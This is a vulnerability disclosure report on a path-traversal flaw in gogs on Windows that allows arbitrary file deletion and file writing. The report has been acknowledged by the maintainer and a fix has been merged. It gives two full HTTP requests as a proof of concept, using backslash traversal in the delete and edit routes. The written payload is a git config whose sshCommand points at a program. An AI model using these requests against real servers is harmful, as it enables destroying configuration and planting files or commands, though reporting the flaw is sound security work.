Path traversal leads to arbitrary file deletions and file writes in gogs/gogs

Valid

Reported on

Jun 2nd 2022


Description

Deploy and run gogs in Windows.

Proof of Concept

1.Create a repository in Gogs, upload a file named test to the repository on the web page, The content of the file is as follows:

1111

2.The attacker can remove any files.

http request:

POST /admin1/repo6/_delete/master/..\..\..\../README.md HTTP/1.1 HTTP/1.1
Host: 192.168.1.59:3000
Content-Length: 130
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: lang=zh-CN; i_like_gogs=858a2bd132c75d53
Connection: close

_csrf=PuAr2ZVY2NpoEOR1se-J81LVboM6MTY1NDAwODAzNDgzNDEwOTAwMA&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=

  1. The attacker can set tree_path tree_path=..\..\files.txt to upload any files into any directory.

http request:

POST /admin1/repo6/_edit/master/test HTTP/1.1
Host: 192.168.1.59:3000
Content-Length: 722
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: lang=zh-CN; i_like_gogs=858a2bd132c75d53
Connection: close

_csrf=CQ7KgJoDP2oI1xKrj0bx1GtYiQ46MTY1NDAwNzk1MjA5ODk5MTQwMA&last_commit=11e2a5c721b9f9cbe4bb32bcdcc6318794e350ff&tree_path=..\..\..\..\file111&content=%5Bcore%5D%0D%0A++++repositoryformatversion+%3D+0%0D%0A++++filemode+%3D+true%0D%0A++++bare+%3D+false%0D%0A++++logallrefupdates+%3D+true%0D%0A++++ignorecase+%3D+true%0D%0A++++precomposeunicode+%3D+true%0D%0A++++sshCommand+%3D+notepad%0D%0A%5Bremote+%22origin%22%5D%0D%0A++++url+%3D+git%40github.com%3Atorvalds%2Flinux.git%0D%0A++++fetch+%3D+%2Brefs%2Fheads%2F*%3Arefs%2Fremotes%2Forigin%2F*%0D%0A%5Bbranch+%22master%22%5D%0D%0A++++remote+%3D+origin%0D%0A++++merge+%3D+refs%2Fheads%2Fmaster%0D%0A%0D%0A%0D%0A&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=

Impact

1.Delete arbitrary files, such as gogs/custom/conf/app.ini

2.Write the files to any path.

We are processing your report and will contact the gogs team within 24 hours. 23 days ago
gogs/gogs maintainer has acknowledged this report 23 days ago
Joe Chen validated this vulnerability 22 days ago
1135 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Joe Chen
22 days ago

Maintainer


Poor Windows...

We have sent a fix follow up to the gogs team. We will try again in 7 days. 19 days ago
Joe Chen confirmed that a fix has been merged on 2ca014 18 days ago
The fix bounty has been dropped
to join this conversation